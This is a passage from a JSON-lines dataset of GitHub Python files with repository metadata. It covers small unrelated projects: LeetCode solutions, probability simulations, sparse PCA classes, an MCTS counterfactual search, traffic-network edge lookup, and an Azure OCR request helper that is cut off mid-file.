set()\n\n cur = head\n rescur = pre\n\n while cur:\n if cur.val not in used and (not cur.next or cur.next.val != cur.val):\n rescur.next = cur\n rescur = rescur.next\n used.add(cur.val)\n cur = cur.next\n rescur.next = None\n\n return pre.next","repo_name":"CA2528357431/leetcode-note","sub_path":"LIST1/0267 82.py","file_name":"0267 82.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"75"} +{"seq_id":"29783681948","text":"#!/usr/bin/env python3\n\nimport math\nimport random\n\ndef coumpound_all_prob(prob_list):\n total_prob = 0.0\n l = len(prob_list)\n if(l==1):\n return prob_list[0]\n elif(l==2):\n return 2.0*prob_list[0]*prob_list[1]\n # else recursive step\n for i, el in enumerate(prob_list):\n # create sublist\n sl = prob_list[:]\n sl.pop(i)\n total_prob += el * coumpound_all_prob(sl)\n return total_prob\n\ndef coumpound_all_prob_fact(prob_list, tries):\n if(tries < len(prob_list)):\n return None\n total_prob = 1.0\n for i in prob_list:\n total_prob *= i\n accum_mult = 0.0\n for i in range(tries - len(prob_list)):\n for j in prob_list:\n accum_mult += math.pow(j, 1.0+i)\n fact_num = math.factorial(tries) / math.factorial(1+tries-len(prob_list))\n print(total_prob, accum_mult, tries, fact_num)\n return accum_mult * total_prob * fact_num\n\ndef single_run_mc(prob_list, tries):\n # build a simple list with cumulated values\n accum = 0.0\n a_pl = []\n res_pl = []\n for i in prob_list:\n accum += i\n a_pl.append(accum)\n res_pl.append(0)\n #print(a_pl)\n for i in range(tries):\n cr = random.randint(1, 1000000)/1000000.0\n #print(cr)\n for j in range(len(a_pl)):\n if cr <= a_pl[j]:\n res_pl[j] = 1\n break\n #print(res_pl)\n accum = 0\n for i in res_pl:\n accum += i\n #print(accum >= len(res_pl), \"\\n\")\n return accum >= len(res_pl)\n\ndef coumpound_all_prob_mc(prob_list, tries):\n if(tries < len(prob_list)):\n return None\n total_ok = 0\n samples = 1000000\n i = 0\n while i < samples:\n total_ok += 1 if single_run_mc(prob_list, tries) else 0\n i += 1\n return 1.0 * total_ok / samples\n\ndef main():\n mv = [0.3872, 0.3872, 0.2256]\n #mv = [0.1, 0.1, 0.1]\n n_tries = 5\n print(coumpound_all_prob_fact(mv, n_tries))\n print(coumpound_all_prob_mc(mv, n_tries))\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"Emanem/wfdrops","sub_path":"stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":2030,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"75"} +{"seq_id":"46597169252","text":"# Import all libraries\nimport sys\nfrom ARCHIVE.library import *\nfrom logger import *\n\n\ndef account_verification():\n \"\"\"\n Verifies the account and logs an error message if an exception occurs.\n \"\"\"\n try:\n pass\n except Exception as e:\n logging.error(f\"Unable to verify account! Exception: {e}\")\n sys.exit()\n\n\ndef clear_orders(open_orders):\n \"\"\"\n Clears all open orders and logs information about the process.\n\n Args:\n open_orders: A list of open orders.\n \"\"\"\n logging.info(f\"List of open orders: {open_orders}\")\n\n for order in open_orders:\n logging.info(f\"Closing order {order.id}\")\n\n logging.info(\"Clearing all open orders.\")\n\n\ndef get_ticker():\n \"\"\"\n Prompt the user to enter a ticker symbol and return it.\n\n Returns:\n str: The entered ticker symbol.\n \"\"\"\n ticker = input(\"What ticker do you want to operate with? Ticker: \")\n return ticker\n\n\ndef main():\n \"\"\"\n Main function to:\n - Initialize logging\n - Verify the account\n - Clear orders\n - Get the user's desired ticker.\n \"\"\"\n initialize_logging()\n account_verification()\n\n # Example open_orders list for demonstration\n open_orders = []\n clear_orders(open_orders)\n\n ticker = get_ticker()\n\n mytrader = TraderBot(ticker)\n mytrader.run()\n\n print(f\"Operating with ticker: {ticker}\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"redayzarra/PocketTrader","sub_path":"ARCHIVE/LoserBot.py","file_name":"LoserBot.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"24476763861","text":"import numpy as np\nimport math\nfrom src.models.counterfactual import CF\nfrom src.optimization.mcts import MCTS\nimport sys\n\nclass MCTSSearch:\n\n def __init__(self, env, bb_model, dataset, obj, params, cfmode, c):\n self.env = env\n self.bb_model = bb_model\n self.dataset = dataset\n self.n_var = env.state_dim\n self.obj = obj\n\n self.n_iter = params['ts_n_iter']\n self.n_expand = params['ts_n_expand']\n self.max_cf_path_len = params['max_cf_path_len']\n self.cfmode = cfmode\n\n self.c = c\n self.action_dic = {0: 'SOUTH', 1: 'NORTH', 2: 'EAST', 3: 'WEST', 4:'PICKUP', 5: 'DROPOFF'}\n \n def generate_counterfactuals(self, fact, target, nbhd=None):\n mcts_solver = MCTS(self.env, self.bb_model, self.obj, fact, target, self.cfmode, c=self.c, max_level=self.max_cf_path_len, n_expand=self.n_expand)\n found = False\n\n tree_size, time = mcts_solver.search(init_state=fact, num_iter=self.n_iter)\n\n all_nodes = self.traverse(mcts_solver.root)\n\n potential_cf = []\n illegal = 0\n \n for n in all_nodes: \n if n.is_terminal():\n if(not(self.env.check_done(n.state)) and self.bb_model.predict(n.state) == target and self.cfmode != \"NETACTION\"):\n n.state_path = [self.env.encode(fact[0],fact[1],fact[2],fact[3])] + n.state_path\n action_path = self.getActionPath(n.prev_actions)\n if(self.cfmode != 'ACTION_CHANGELOC' and self.cfmode != 'ACTION_CHANGEBOTH'):\n if(self.pickuplocchange(n.state_path) == False):\n potential_cf += [CF(n.state, True, n.prev_actions, n.cumulative_reward, n.get_reward(), tree_size, time, n.state_path, len(action_path), action_path)]\n else:\n potential_cf += [CF(n.state, True, n.prev_actions, n.cumulative_reward, n.get_reward(), tree_size, time, n.state_path, len(action_path), action_path)]\n elif(self.cfmode == \"NETACTION\" and self.bb_model.predict(n.state) == self.bb_model.predict(fact) and not(self.env.check_done(n.state))):\n n.state_path = [self.env.encode(fact[0],fact[1],fact[2],fact[3])] + n.state_path\n action_path = self.getActionPath(n.prev_actions)\n potential_cf += [CF(n.state, True, n.prev_actions, n.cumulative_reward, n.get_reward(), tree_size, time, n.state_path, len(action_path), action_path)]\n\n # return only the best one\n print('Found {} counterfactuals'.format(len(potential_cf)))\n\n if len(potential_cf):\n best_cf_ind = np.argmax([cf.value for cf in potential_cf])\n try:\n best_cf = potential_cf[best_cf_ind]\n except IndexError:\n return None\n else:\n return None\n\n \n return best_cf\n \n def traverse(self, root, nodes=None):\n ''' Returns all nodes in the tree '''\n if nodes is None:\n nodes = set()\n\n nodes.add(root)\n \n \n if root.children is not None and len(root.children):\n children = []\n for action in root.children.keys():\n children += root.children[action]\n\n for c in children:\n self.traverse(c, nodes)\n return nodes\n \n def getPath(self, child, root, nodes, length):\n length += [self.env.encode(child.state[0],child.state[1],child.state[2],child.state[3])]\n if(child == root):\n return length\n else:\n return self.getPath(child.parent, root, nodes, length)\n \n def getActionPath(self, path):\n action_path = []\n for a in path:\n action_path += [self.action_dic[a]]\n return action_path\n\n def pickuplocchange(self, path):\n path2 = path.copy()\n if(len(path2) > 1):\n s1 = list(self.env.decode(path2.pop(0)))\n s2 = list(self.env.decode(path2.pop(0)))\n done = False\n while not(done):\n #Changed passanger state wihtout being in taxi\n if (s1[2] != s2[2] and s1[2] != 4 and s2[2] != 4):\n print(\"PickupChanged: \", s1, s2)\n return True\n if len(path2) == 0:\n done = True\n else:\n s1 = s2\n s2 = list(self.env.decode(path2.pop(0)))\n return False","repo_name":"ckenneytcd/Counterfactual-Explanation-GenerationForReinforcementLearning","sub_path":"src/optimization/monte_carlo_cfsearch.py","file_name":"monte_carlo_cfsearch.py","file_ext":"py","file_size_in_byte":4494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"3089633725","text":"from typing import Optional, List\nimport pandas as pd\nimport numpy as np\nfrom feature_engine.selection.base_selector import BaseSelector\nfrom tqdm import tqdm\n\nfrom sklearn.base import BaseEstimator, TransformerMixin\nfrom sklearn.decomposition._sparse_pca import SparsePCA\nfrom sklearn.decomposition._dict_learning import dict_learning\nfrom sklearn.utils.extmath import svd_flip\nfrom sklearn.linear_model import ElasticNet\n\n\nfrom scipy.linalg import sqrtm\nfrom scipy.optimize import minimize\n\nfrom itertools import repeat\n\nfrom multiprocessing import Pool\n\n\nclass EnetSPCA(BaseEstimator, TransformerMixin):\n \"\"\"\n SKLearn compatible transformer implementing the SPCA algorithm as described in \"Sparse Principal Component Analysis\" Zou et al (2006)\n \"\"\"\n def __init__(self, n_components=20, max_iter=10000, tol=0.00001, alpha = 0.1, l1_ratio = 0.5, use_sklearn = True, n_jobs = 0):\n self.max_iter = max_iter\n self.tol = tol\n self.n_components = n_components\n self.n_comps = n_components\n self.alpha = alpha\n self.l1_ratio = l1_ratio\n self.n_jobs = n_jobs\n self.loadings = None\n self.nonzero = -1\n self.zero = -1\n self.totloadings = -1\n self.use_sklearn = use_sklearn\n self.pca_loadings = None\n\n def fit(self, X, y=None, verbose=0):\n \n n_jobs = self.n_jobs\n # Calculate total number of loadings\n self.totloadings = self.n_components * X.shape[1]\n self.nonzero = self.totloadings\n\n # Setup progress bar\n if verbose:\n print(\"Progress based on max iterations:\")\n pbar = tqdm(total=self.max_iter)\n\n # Convert to numpy array if necessary\n if isinstance(X, pd.DataFrame):\n X = X.values\n\n ## Step 1: Setup first iteration\n _, _, Vt = np.linalg.svd(X, full_matrices=False)\n self.pca_loadings = Vt.T[:, :self.n_comps]\n A = Vt.T[:, :self.n_comps]\n B = np.zeros((A[:, 0].shape[0], self.n_comps))\n XtX = X.T @ X\n Sig_root = sqrtm(XtX)\n Sig_root = Sig_root.real\n\n # ElasticNET() is not suitable for alpha = 0, return PCA results\n if self.alpha == 0:\n self.loadings = A\n return self\n\n # Initialize progress monitors arbitrarily large\n diff, diff_nonimprove = 100, 0\n iter = 0\n\n ## Loop of step 2 and 3 until convergence / maxiter:\n while (\n iter < self.max_iter and diff > self.tol and diff_nonimprove < 3\n ):\n B_old = np.copy(B)\n\n ## Update B (step 2*)\n\n # Check if user wants to use sklearn or scipy implementation\n if self.use_sklearn:\n\n # Setup parallelization if n_jobs != 0\n if n_jobs != 0:\n\n if n_jobs == -1:\n threads = None\n else:\n threads = n_jobs\n\n # Setup thread pool using a starmap\n map_arr = list(range(self.n_components))\n second_arg = A\n third_arg = Sig_root\n with Pool(threads) as pool:\n B = np.array(\n pool.starmap(\n self._enet_criterion,\n zip(map_arr, repeat(second_arg), repeat(third_arg)),\n )\n )\n B = B.T\n\n else:\n for i in range(self.n_components):\n B[:, i] = (\n ElasticNet(\n alpha=self.alpha,l1_ratio = self.l1_ratio, fit_intercept=False, max_iter=14000\n )\n .fit(Sig_root, Sig_root @ A[:, i])\n .coef_\n )\n\n else:\n # Scipy implementation, basically not-runnable due to time constraints.\n for i in range(self.n_comps):\n B[:, i] = minimize(self._criterion, np.zeros(A[:, i].shape[0]), args=(XtX, A[:, i]))\n # print(i)\n\n # Monitor change\n diff_old = diff\n diff = np.linalg.norm(np.abs(B - B_old))\n if diff_old < diff:\n diff_nonimprove += 1\n\n # print(diff)\n\n # Update A (step 3)\n # A_old = A\n Un, s, Vnt = np.linalg.svd(XtX @ B, full_matrices=False)\n A = Un @ Vnt\n\n iter = iter + 1\n if verbose:\n pbar.update(1)\n\n if verbose:\n pbar.close()\n\n # Normalize loadings after loop\n B = self._normalize_mat(B)\n self.loadings = B\n self.nonzero = np.count_nonzero(B)\n self.zero = self.totloadings - self.nonzero\n return self\n\n def transform(self, X, y=None):\n if self.alpha == 0:\n return X @ self.pca_loadings\n return X @ self.loadings\n\n def _max_diff(self, X1, X2):\n return np.max(np.abs(X1 - X2))\n\n def _normalize_mat(self, X):\n for i in range(X.shape[1]):\n X[:, i] = X[:, i] / np.maximum(np.linalg.norm(X[:, i]), 1)\n return X\n\n def _criterion(self, x, XtX, alpha_j):\n return (\n (alpha_j - x).T @ XtX @ (alpha_j - x)\n + self.alpha * self.l1_ratio * np.linalg.norm(x, 1)\n + 0.5 * self.alpha * (1 - self.l1_ratio) * np.linalg.norm(x, 2)\n )\n\n def _enet_criterion(self, i, A, Sig_root):\n return (\n ElasticNet(alpha=self.alpha, l1_ratio = self.l1_ratio, fit_intercept=False, max_iter=14000)\n .fit(Sig_root, Sig_root @ A[:, i])\n .coef_\n )\n\n\nclass LoadingsSPCA(SparsePCA):\n \"\"\"\n This class, LoadingsSPCA, is an altered version of the SparsePCA class from\n scikit-learn (sklearn). The main difference is that LoadingsSPCA includes\n an additional attribute, 'loadings', which saves the loadings from the PCA analysis.\n The class uses the same parameters and methods as the sklearn SparsePCA class,\n with the added functionality of saving the loadings for further analysis.\n\n Parameters\n ----------\n n_components : int or None (default: None)\n Number of sparse components to use. If None, use all the components\n alpha : float (default: 1)\n Sparsity controlling parameter. Higher values lead to sparser solutions\n ridge_alpha : float (default: 0.01)\n Amount of ridge shrinkage to apply in order to improve conditioning when\n calling the transform method\n max_iter : int (default: 1000)\n Maximum number of iterations to perform\n tol : float (default: 1e-8)\n Tolerance for stopping criterion\n method : {'lars', 'cd'} (default: 'lars')\n lars: uses the least angle regression method to solve the lasso problem\n cd: uses the coordinate descent method to compute the Lasso solution\n n_jobs : int or None (default: None)\n Number of parallel jobs to run. None means 1.\n ``-1`` means using all processors.\n U_init : array of shape (n_features, n_components)\n Initial values for the loadings for warm restart scenarios\n V_init : array of shape (n_samples, n_components)\n Initial values for the codes for warm restart scenarios\n verbose : bool (default: False)\n If verbose is True the objective function and sparsity are printed at each\n iteration\n random_state : int, RandomState instance or None (default: None)\n Seed of the pseudo random number generator to use when shuffling the data.\n\n Attributes\n ----------\n components_ : array, [n_components, n_features]\n Sparse components extracted from the data.\n error_ : array\n Vector of errors at each iteration\n n_iter_ : int\n Number of iterations run\n loadings_ : array\n The loadings from the PCA analysis\n\n \"\"\"\n\n def __init__(\n self,\n n_components=None,\n *,\n alpha=1,\n ridge_alpha=0.01,\n max_iter=1000,\n tol=1e-8,\n method=\"lars\",\n n_jobs=None,\n U_init=None,\n V_init=None,\n verbose=False,\n random_state=None,\n ):\n super().__init__(\n n_components=n_components,\n alpha=alpha,\n ridge_alpha=ridge_alpha,\n max_iter=max_iter,\n tol=tol,\n method=method,\n n_jobs=n_jobs,\n verbose=verbose,\n random_state=random_state,\n U_init=U_init,\n V_init=V_init,\n )\n\n def _fit(self, X, n_components, random_state):\n # Transpose U and V for dictionary learning if the have been initialized\n code_init = self.V_init.T if self.V_init is not None else None\n dict_init = self.U_init.T if self.U_init is not None else None\n\n # Perform dictionary learning to solve the PCA problem with l1 penalty on the components\n code, dictionary, E, self.n_iter_ = dict_learning(\n X.T,\n n_components,\n alpha=self.alpha,\n tol=self.tol,\n max_iter=self.max_iter,\n method=self.method,\n n_jobs=self.n_jobs,\n verbose=self.verbose,\n random_state=random_state,\n code_init=code_init,\n dict_init=dict_init,\n return_n_iter=True,\n )\n\n # flip eigenvectors' sign to enforce deterministic output\n code, dictionary = svd_flip(code, dictionary, u_based_decision=False)\n self.components_ = code.T\n\n # Normalize the components\n components_norm = np.linalg.norm(self.components_, axis=1)[:, np.newaxis]\n components_norm[components_norm == 0] = 1\n self.components_ /= components_norm\n\n # Set attributes\n self.n_components_ = len(self.components_)\n self.error_ = E\n\n # Save loadings and amount of zero and nonzero elements\n self.loadings = self.components_.T\n self.nonzero = np.count_nonzero(self.loadings)\n self.zero = self.loadings.shape[0] * self.loadings.shape[1] - self.nonzero\n\n return self\n\n\nclass GeneSPCA(BaseEstimator, TransformerMixin):\n\n \"\"\"\n SKLearn compatible transformer implementing the SPCA variant\n for gene expression data as described in \"Sparse Principal Component Analysis\" Zou et al (2006)\n \"\"\"\n\n def __init__(\n self, n_components=20, max_iter=10000, tol=0.0001, improve_tol=0.00001, alpha=5\n ):\n self.max_iter = max_iter\n self.tol = tol\n self.improve_tol = improve_tol\n self.n_components = n_components\n self.n_comps = n_components\n self.alpha = alpha\n self.loadings = None\n self.hasFit = False\n self.nonzero = -1\n self.zero = -1\n self.totloadings = -1\n\n def fit(self, X, y=None, verbose=0):\n\n self.totloadings = self.n_components * X.shape[1]\n\n if verbose:\n # print(\"Progress based on max iterations:\")\n pbar = tqdm(total=self.max_iter)\n\n if isinstance(X, pd.DataFrame):\n X = X.values\n\n # Step 1: Setup first iteration\n U, _, Vt = np.linalg.svd(X, full_matrices=False)\n A = Vt.T[:, : self.n_components]\n B = np.zeros((A[:, 0].shape[0], self.n_components))\n XtX = X.T @ X\n\n # Initialize progress monitors arbitrarily large\n diff, diff_improve = 100, 100\n iter = 0\n\n # Loop of step 2 and 3 until convergence / maxiter:\n while (\n iter < self.max_iter and diff > self.tol and diff_improve > self.improve_tol\n ):\n B_old = np.copy(B)\n\n # Update B (step 2*)\n input = A.T @ XtX\n for i in range(self.n_components):\n B[:, i] = self._soft_threshold(input[i, :], self.alpha)\n\n # Monitor change\n diff_old = diff\n diff = self._max_diff(B_old, B)\n diff_improve = np.abs(diff - diff_old)\n\n # print(diff)\n\n # Update A (step 3)\n A_old = A\n Un, s, Vnt = np.linalg.svd(XtX @ B, full_matrices=False)\n A = Un @ Vnt\n\n if verbose:\n pbar.update(1)\n iter = iter + 1\n if verbose:\n pbar.close()\n\n # Normalize loadings after loop\n B = self._normalize_mat(B)\n self.loadings = B\n self.nonzero = np.count_nonzero(B)\n self.zero = self.totloadings - self.nonzero\n return self\n\n def transform(self, X, y=None):\n return X @ self.loadings\n\n # Internal class helper functions\n def _soft_threshold(self, vec, l1):\n temp = np.maximum(0, (np.abs(vec) - l1 / 2))\n return temp * np.sign(vec)\n\n def _max_diff(self, X1, X2):\n return np.max(np.abs(X1 - X2))\n\n def _normalize_mat(self, X):\n for i in range(X.shape[1]):\n X[:, i] = X[:, i] / np.maximum(np.linalg.norm(X[:, i]), 1)\n return X\n\n\nclass AddFeatureNames(BaseSelector):\n \"\"\"Adds the feature names back to the transformed data.\"\"\"\n\n def __init__(\n self,\n feature_names: Optional[List[str]] = None,\n prefix: Optional[str] = \"feature_\",\n ):\n self.feature_names = feature_names\n self.prefix = prefix\n\n def fit(self, X: pd.DataFrame, y: pd.Series = None):\n \"\"\"Fit to data, then transform it.\"\"\"\n if self.feature_names is None:\n self.feature_names = [f\"{self.prefix}{i}\" for i in range(X.shape[1])]\n\n if len(self.feature_names) != X.shape[1]:\n raise ValueError(\n f\"Number of features in X ({X.shape[1]}) does not match \"\n f\"number of features in feature_names ({len(self.feature_names)}).\"\n )\n\n return self\n\n def transform(self, X: pd.DataFrame) -> pd.DataFrame:\n \"\"\"Transforms the data.\"\"\"\n X = pd.DataFrame(X)\n X.columns = self.feature_names\n return X\n","repo_name":"jaccobroere/vu-case-study-eds","sub_path":"src/helpers/helper_classes.py","file_name":"helper_classes.py","file_ext":"py","file_size_in_byte":14062,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"26458505616","text":"\"\"\"\nMeta flags\n\nWe explicitly categorize some flags to be metaflags and define the semantics\nthat they can be changed without creating immutability issues. Hence, they will\nnever be part of the signature.\n\nThese meta flags are available to all the constructs\n(datasets, pipelines, fields, featuresets, extractors, individual features,\npipelines etc.)\n\nMeta flags are used to indicate the status of the object. They are used to\nindicate whether the object is deprecated, deleted, or a work in progress.\n\"\"\"\n\nimport functools\nimport re\n\nfrom typing import Any, List, Optional\n\nimport fennel.gen.metadata_pb2 as proto\nfrom fennel._vendor.pydantic import BaseModel, validator # type: ignore\n\nEMAIL_REGEX = r\"^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\\.[a-zA-Z0-9-.]+$\"\nMETA_FIELD = \"__fennel_metadata__\"\n\n\nclass Metadata(BaseModel):\n owner: str\n tags: List[str]\n description: str\n deprecated: bool = False\n deleted: bool = False\n\n @validator(\"owner\")\n def owner_is_valid_email_address(cls, owner):\n if owner is None or owner == \"\":\n return owner\n if re.match(EMAIL_REGEX, owner) is None:\n raise ValueError(f\"Invalid email '{owner}'\")\n return owner\n\n\ndef meta(\n owner: str = \"\",\n description: str = \"\",\n tags: List[str] = [],\n deprecated: bool = False,\n deleted: bool = False,\n):\n \"\"\"meta decorator\n\n meta decorator is used to add a metadata object to the decorated object.\n It takes in the following arguments:\n Parameters\n ----------\n owner : str\n The owner of the object\n description : str\n A description of the object\n tags : List[str]\n A list of tags associated with the object\n deprecated : bool\n Whether the object is deprecated\n deleted : bool\n Whether the object is deleted\n \"\"\"\n\n @functools.wraps(meta)\n def decorator(obj: Any):\n meta = Metadata(\n owner=owner,\n description=description,\n tags=tags,\n deprecated=deprecated,\n deleted=deleted,\n )\n setattr(obj, META_FIELD, meta)\n return obj\n\n return decorator\n\n\ndef get_meta(obj: Any) -> Optional[Metadata]:\n if not hasattr(obj, META_FIELD):\n return None\n return getattr(obj, META_FIELD)\n\n\ndef get_meta_attr(obj: Any, attr: str) -> Any:\n meta = get_meta(obj)\n if meta is None:\n return None\n return getattr(meta, attr)\n\n\ndef set_meta_attr(obj: Any, attr: str, value: Any):\n meta = get_meta(obj)\n if meta is None:\n meta = Metadata(owner=\"\", description=\"\", tags=[])\n setattr(meta, attr, value)\n setattr(obj, META_FIELD, meta)\n\n\ndef get_metadata_proto(obj: Any) -> proto.Metadata:\n meta = get_meta(obj)\n if meta is None:\n return proto.Metadata()\n return proto.Metadata(\n owner=meta.owner,\n description=meta.description,\n tags=meta.tags,\n deprecated=meta.deprecated,\n deleted=meta.deleted,\n )\n","repo_name":"fennel-ai/client","sub_path":"fennel/lib/metadata/metadata.py","file_name":"metadata.py","file_ext":"py","file_size_in_byte":2972,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"75"} +{"seq_id":"15578238409","text":"import torch\n\nfrom transformers import BertForSequenceClassification\nmodel = BertForSequenceClassification.from_pretrained('bert-base-uncased')\nmodel.train()\n\nfrom transformers import AdamW\nno_decay = ['bias', 'LayerNorm.weight']\noptimizer_grouped_parameters = [\n {'params': [p for n, p in model.named_parameters() if not any(nd in n for nd in no_decay)], 'weight_decay': 0.01},\n {'params': [p for n, p in model.named_parameters() if any(nd in n for nd in no_decay)], 'weight_decay': 0.0}\n]\noptimizer = AdamW(optimizer_grouped_parameters, lr=1e-5)\n\nfrom main import load_txts\ntxt_dir = '../TXT_165/'\n\ntxts = load_txts(txt_dir)\n\nimport spacy\nnlp = spacy.load('en_core_web_sm')\nraw_text = txts[0]\ndoc = nlp(raw_text)\nsentences = [sent.text.strip() for sent in doc.sents]\nprint(sentences)\n\nfrom transformers import BertTokenizer\ntokenizer = BertTokenizer.from_pretrained('bert-base-uncased')\nfor sentence in sentences:\n encoding = tokenizer(sentence, return_tensors='pt', padding=True, truncation=True)\n input_ids = encoding['input_ids']\n attention_mask = encoding['attention_mask']\n\n labels = torch.tensor([1, 0, 0]).unsqueeze(0)\n outputs = model(input_ids, attention_mask=attention_mask, labels=labels)\n loss = outputs.loss\n loss.backward()\n optimizer.step()\n\nprint(outputs.logits)","repo_name":"fernandapinodelgado/NDC-Project","sub_path":"src/bert.py","file_name":"bert.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"75"} +{"seq_id":"14182682701","text":"'''\nTime: O(N)\nSpace: O(1)\n\n执行结果:通过\n显示详情\n执行用时:20 ms, 在所有 Python 提交中击败了63.86%的用户\n内存消耗:12.9 MB, 在所有 Python 提交中击败了61.45%的用户\n'''\n\nclass Solution(object):\n def totalMoney(self, n):\n \"\"\"\n :type n: int\n :rtype: int\n \"\"\"\n total = x_th = 0\n for i in range(n):\n if i % 7 == 0:\n x_th += 1\n current_base = x_th\n total += current_base + (i % 7)\n\n return total\n\n\n'''\nTime: O(1)\nSpace: O(1)\n\n执行用时:32 ms, 在所有 Python3 提交中击败了76.68% 的用户\n内存消耗:14.9 MB, 在所有 Python3 提交中击败了63.68% 的用户\n通过测试用例:106 / 106\n'''\nclass Solution:\n def totalMoney(self, n: int) -> int:\n q, r = divmod(n, 7)\n # 1 + 2 + 3 + 4 + 5 + 6 + 7 = 28\n # 28, 28 + (q - 1) * 7\n m1 = (28 + 28 + (q - 1) * 7) * q // 2\n # 1 + q, 1 + q + r - 1\n m2 = (1 + q + q + r) * r // 2\n return m1 + m2\n","repo_name":"lixiang2017/leetcode","sub_path":"leetcode-cn/1716.0_Calculate_Money_in_Leetcode_Bank.py","file_name":"1716.0_Calculate_Money_in_Leetcode_Bank.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"13936690194","text":"import random\n\ndef get_town(map_size):\n x = random.randint(0, map_size)\n y = random.randint(0, map_size)\n return (x, y)\n\ndef get_instance_string(quantity, map_size):\n instance = f\"{quantity}\\n\"\n\n for i in range(quantity):\n x, y = get_town(map_size)\n instance += f'{i + 1} {x} {y}\\n'\n\n return instance\n\nprint(get_instance_string(6, 1000))","repo_name":"mudziok/ok","sub_path":"gen_instances.py","file_name":"gen_instances.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"32783368274","text":"# -*- encoding: utf-8 -*-\nfrom . import db\n\nfrom lazyblacksmith.models.utcdatetime import UTCDateTime\nfrom lazyblacksmith.utils.time import utcnow\n\nfrom sqlalchemy import func\n\n\nclass ItemPrice(db.Model):\n item_id = db.Column(db.Integer, primary_key=True, autoincrement=False)\n region_id = db.Column(db.Integer, primary_key=True)\n sell_price = db.Column(\n db.Numeric(\n precision=17,\n scale=2,\n decimal_return_scale=2,\n asdecimal=False\n ),\n nullable=True\n )\n buy_price = db.Column(\n db.Numeric(\n precision=17,\n scale=2,\n decimal_return_scale=2,\n asdecimal=False\n ),\n nullable=True\n )\n updated_at = db.Column(\n UTCDateTime(timezone=True), server_default=func.now()\n )\n\n def get_delta_update(self):\n return self.updated_at - utcnow()\n","repo_name":"Kyria/LazyBlacksmith","sub_path":"lazyblacksmith/models/api/item_price.py","file_name":"item_price.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"75"} +{"seq_id":"16818503415","text":"# https://sumo.dlr.de/docs/Tools/Sumolib.html#locate_nearby_edges_based_on_the_geo-coordinate\n# https://sumo.dlr.de/pydoc/sumolib.html\n\nimport sumolib\n\n# parse the net\nnet = sumolib.net.readNet('./cologne_scenario/cologne.net.xml')\n\nedge = net.getEdge('-132409814#4')\nfromId = edge.getFromNode()\ntoId = edge.getToNode()\nfromCoord = fromId.getCoord()\ntoCoord = toId.getCoord()\nlon, lat = net.convertXY2LonLat(fromCoord[0], fromCoord[1])\n\nprint(edge)\nprint(fromId, toId)\nprint(fromCoord, toCoord)\nprint(lat, \",\", lon)\n\n\n# locate nearby edges based on the geo-coordinate\n# This requires the module pyproj to be installed. For larger networks rtree is also strongly recommended.\nradius = 0.12\nx, y = net.convertLonLat2XY(7.013019057413672, 50.94135355923195)\nedges = net.getNeighboringEdges(x, y, radius)\n\n\nclosest = (float('inf'), None)\nfor edge, distance in edges:\n print(edge, distance)\n if distance < closest[0]:\n closest = (distance, edge)\n\nprint(closest)\n\n# # pick the closest edge\n# if len(edges) > 0:\n# distancesAndEdges = sorted([(dist, edge) for edge, dist in edges])\n# dist, closestEdge = distancesAndEdges[0]\n# #\n# # print(dist, closestEdge)\n","repo_name":"farima-pixel/ATHENA","sub_path":"helper/locate_nearby_edges.py","file_name":"locate_nearby_edges.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"10001688333","text":"from abc import ABC, abstractmethod\nfrom typing import Any, Dict, Optional, cast\n\nimport aiohttp\n\n\nclass RemoteAPI(ABC):\n @property\n @abstractmethod\n def base_url(self) -> str:\n ...\n\n @property\n def _headers(self) -> Dict[str, str]:\n return {}\n\n async def __aenter__(self) -> \"RemoteAPI\":\n self._session: Optional[aiohttp.ClientSession] = aiohttp.ClientSession(\n raise_for_status=True, headers=self._headers\n )\n return self\n\n async def __aexit__(self, *err: Any) -> None:\n assert self._session is not None\n await self._session.close()\n self._session = None\n\n async def _get(self, path: str, **kwargs: Any) -> Dict[\"str\", Any]:\n assert self._session is not None\n async with self._session.get(f\"{self.base_url}{path}\", **kwargs) as resp:\n return cast(Dict[\"str\", Any], await resp.json())\n\n async def _post(self, path: str, **kwargs: Any) -> Dict[\"str\", Any]:\n assert self._session is not None\n async with self._session.post(f\"{self.base_url}{path}\", **kwargs) as resp:\n return cast(Dict[\"str\", Any], await resp.json())\n","repo_name":"tyra314/modweaver","sub_path":"modweaver/remote.py","file_name":"remote.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"75"} +{"seq_id":"20741817151","text":"# coding: utf-8\nimport requests\nimport slackbot_settings\n\nKEY1 = slackbot_settings.KEY1\n\n# locationを東アジアで登録した場合のendpoint\nendpoint = 'https://eastasia.api.cognitive.microsoft.com/vision/v1.0/ocr'\n\ndef get_text_by_ms(image=None):\n params = {'visualFeatures': 'Categories,Description,Color'}\n\n headers = {\n 'Ocp-Apim-Subscription-Key': KEY1,\n \"Content-Type\": \"application/octet-stream\"\n }\n response = requests.post(\n endpoint,\n headers=headers,\n params=params,\n data=image,\n )\n\n status = response.status_code\n data = response.json()\n\n if status != 200:\n\n if data['code'] == 'InvalidImageSize':\n text = '画像のサイズが大きすぎます'\n\n elif data['code'] == 